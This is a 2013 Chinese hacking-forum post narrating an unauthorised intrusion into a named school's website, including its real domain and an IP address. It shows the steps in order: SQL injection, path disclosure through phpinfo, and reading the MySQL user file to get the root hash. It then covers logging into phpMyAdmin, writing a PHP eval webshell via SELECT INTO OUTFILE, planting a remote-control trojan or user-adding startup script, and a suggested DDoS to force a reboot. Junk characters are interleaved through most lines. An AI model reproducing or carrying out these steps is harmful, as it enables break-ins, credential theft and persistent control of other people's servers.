找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2904|回复: 1
打印 上一主题 下一主题

友情检测湖北省大治市第一中学

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:32:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏+ }, c! d( u; e& m4 O2 q0 N3 ~
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!
( h' j0 n$ v# a& \% o! v0 `
2 Q2 o2 V7 M+ y0 h! u* ^+ P5 S) y* u8 H( `" n. \

' R+ L0 ~4 [0 W- B! y' J常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 9 y) X' v9 S9 o" N4 H
9 D+ g0 j* ^) t! @
那么想可以直接写入shell ,getshell有几个条件:3 u2 G$ A' q8 f: c2 f
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF
/ }; {+ f9 y! h5 u  ]- s3 p% y2 v& j
! s4 m7 ~3 L+ O: G+ h试着爆绝对路径:
; S$ `9 Z$ C) X3 ]1./phpMyAdmin/index.php?lang[]=1  4 e# Q' I2 Q/ e2 Z. l3 h4 Z
2./phpMyAdmin/phpinfo.php  ; Q5 J! \- K7 I1 Y- F
3./load_file()  
% }- D1 A7 h8 b3 p  w4./phpmyadmin/themes/darkblue_orange/layout.inc.php  3 v1 \7 u. z; l/ B4 h
5./phpmyadmin/libraries/select_lang.lib.php  6 x7 P0 y/ m" m
6./phpmyadmin/libraries/lect_lang.lib.php  
% ]2 {1 _6 b8 ]' R6 ]2 V# `7./phpmyadmin/libraries/mcrypt.lib.php   # \$ v3 H, z6 U) ?; {. V  i
8./phpmyadmin/libraries/export/xls.php  , O1 V7 M' N* S( E+ h

$ T7 Y4 m- ^2 y/ V" J- u均不行...........................2 }3 ^( K& h- g# D

& s: j9 Q8 K0 L8 @/ b0 L御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php8 Z/ `2 z% O- c6 U. v' s" k3 s
0 P* ]- _/ s9 \- w7 Z  z/ Y8 R. T
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
# d4 w3 h1 _: u' y  D- k7 O- C0 H! w  P* w  d4 G
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败' m+ ^% _& h0 |

+ V1 N. N2 c$ n. q( T敏感东西:http://202.103.49.66/Admincp.php  社工进不去...........; F6 g. n& u/ e0 u' s# y+ d. _

6 ~9 e; N7 T# L. A想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
. N' q, S: k# \7 p% @! F; T: u8 V! X0 I
http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini ) {9 L# c7 j" [' T6 K+ D: d: c

, d- A  t  d' h% R8 L5 t自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
" N" Y. i: i9 c4 k# F
1 ?9 S8 }6 D: a2 V成功读到root密码:
, p/ l0 u% L" m& P& X& O: J: S8 |# X' M! e# I
17---- r(0072)
* W5 u5 i0 B+ {! B- s$ D# Y! p18---- o(006f)
: J+ \8 V3 \) g! P. c- o19---- o(006f)
. N  q$ t  J0 A1 h4 R5 c. `' X7 G; y8 e20---- t(0074)2 w$ k0 n! [9 a  w. }7 i- B
21---- *(002a)! s$ z, g7 f( @' D+ Z
22---- 8(0038)
1 U6 Q* p% K* ?23---- 2(0032)
  H( c* F4 [7 |( c, [) H0 X0 s6 O24---- E(0045)
% J, e+ H0 P' O  n- L25---- 1(0031)
% Q. i$ P" Y) {5 n26---- C(0043)
" K9 b! N. c8 A' q27---- 5(0035)8 I" V  A) i3 @1 e$ Z2 _! w
28---- 8(0038)4 o8 e: E& W) {( q$ w: |4 a# x
29---- 2(0032)  K, A% ~0 v7 S
30---- 8(0038)8 K# R0 Z' `+ T7 @! c4 s
31---- A(0041)
8 X. _  s' I1 v32---- 9(0039)
/ A3 Y- x5 K; d, A5 L7 h33---- B(0042)
/ x) a( _4 f% z5 b4 M. y34---- 5(0035)
) `. |7 @% F% `( o35---- 4(0034)
  S& w& s7 `. `  f36---- 8(0038)
% I2 k5 x1 O) L% l# J, v) b$ a37---- 6(0036)
4 r  r% ^. R, N% M38---- 4(0034), d- x+ i* e2 V) n
39---- 9(0039)9 k) S; o# R0 \0 i4 o9 M4 b9 H
40---- 1(0031)
9 [( c7 z+ ?- k" T. A8 Y41---- 1(0031)) S$ u1 {% [; c' F, [
42---- 5(0035)
8 m" M* L0 d* Z2 m' P7 c% J43---- 3(0033)8 d+ f& u9 }7 O! l* \8 e! |
44---- 5(0035)
0 n' d* G+ g, q6 }* x- ?  W; F( S45---- 9(0039); [, C- @' i$ m! K
46---- 8(0038)
' x. |- O- M, F1 J5 }47---- F(0046)/ w6 K/ o) `0 l6 v0 z0 W
48---- F(0046)7 K$ o$ W- B. e
49---- 4(0034)
, n* B7 P6 K8 }50---- F(0046)
* I0 L& S2 V3 Y" c" ]$ X* w51---- 0(0030)5 _9 K) C( {! ?7 W( p
52---- 3(0033)
( {  O) s  N/ z+ G6 q/ l: N( z53---- 2(0032)
$ O7 J: I7 w8 `54---- A(0041)
7 J! a% q' A7 c55---- 4(0034). Z6 G. i. @, ?9 [5 k
56---- A(0041)" Z- _  y  R4 Z- v+ E
57---- B(0042)
& `6 }9 [3 S, q$ f58---- *(0044)
; p8 P% ^2 X4 U59---- *(0035)
9 _, w6 q" Y9 y# H; O3 P! I60---- *(0041)
0 F: m+ T3 \) J$ q61---- *0032)
! x; F, \' _2 Q; T) K; z* c5 z" M" o9 r  \$ L6 z+ R
解密后成功登陆phpmyamin0 \! x1 E; s: e6 ^: C1 p( S( p$ Q
                          * P7 p; X0 D* f5 M

1 T0 b. E/ z: G. K                             ; G$ S9 p1 `+ H" `6 {3 c% N
+ s$ \, _( v- P0 m0 X7 V
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
: a# W; o, a) @* z( m" ]- N* f5 L2 k  _; Y
成功执行,拿下shell,菜刀连接:* ^0 I2 K7 t# j4 g6 I* O0 m+ Q4 h
$ s4 w: C! `" G# H
服务器不支持asp,aspx,php提权无果...................8 P2 ^7 a* f3 U" e
) r; K0 C  r# ^
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:' R* V3 @- |) c1 H+ T% S
服务器上已经有个隐藏帐号了
# F# L7 U5 ^9 N
别名     administrators$ G8 |4 V* n# X
注释     管理员对计算机/域有不受限制的完全访问权

2 J$ |4 t. y) J  D* m' i7 U  e
成员
# n' w* |( I3 A, p- H
-------------------------------------------------------------------------------
- w( l9 P$ |: `: m5 j1 e7 yadmin
4 D+ i' n0 X! r6 f$ c9 XAdministrator
7 o9 j- p- y8 V" \slipper$% U/ D5 ^, l& h/ N0 i
sqluser
( \: @7 m, @  ^& _6 T) y命令成功完成。 - ]4 j) [7 Q/ T% g- C! m8 W
& D% O/ q/ a, `: G) Q% t6 G* K
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
8 s( o7 A: ^* _9 t) T, z" y2 r3 O; {# i9 L, _* f$ e" O' Q# `. [+ k: K3 O
ddos服务器重启,不然就只能坐等服务器重启了..............................." y1 }2 m% g6 p( L9 Z- e3 u
$ \0 ?' \6 {3 J" f
      

8 a% a+ x: a' g6 {0 F

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2013-5-20 15:28:12 | 只看该作者
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表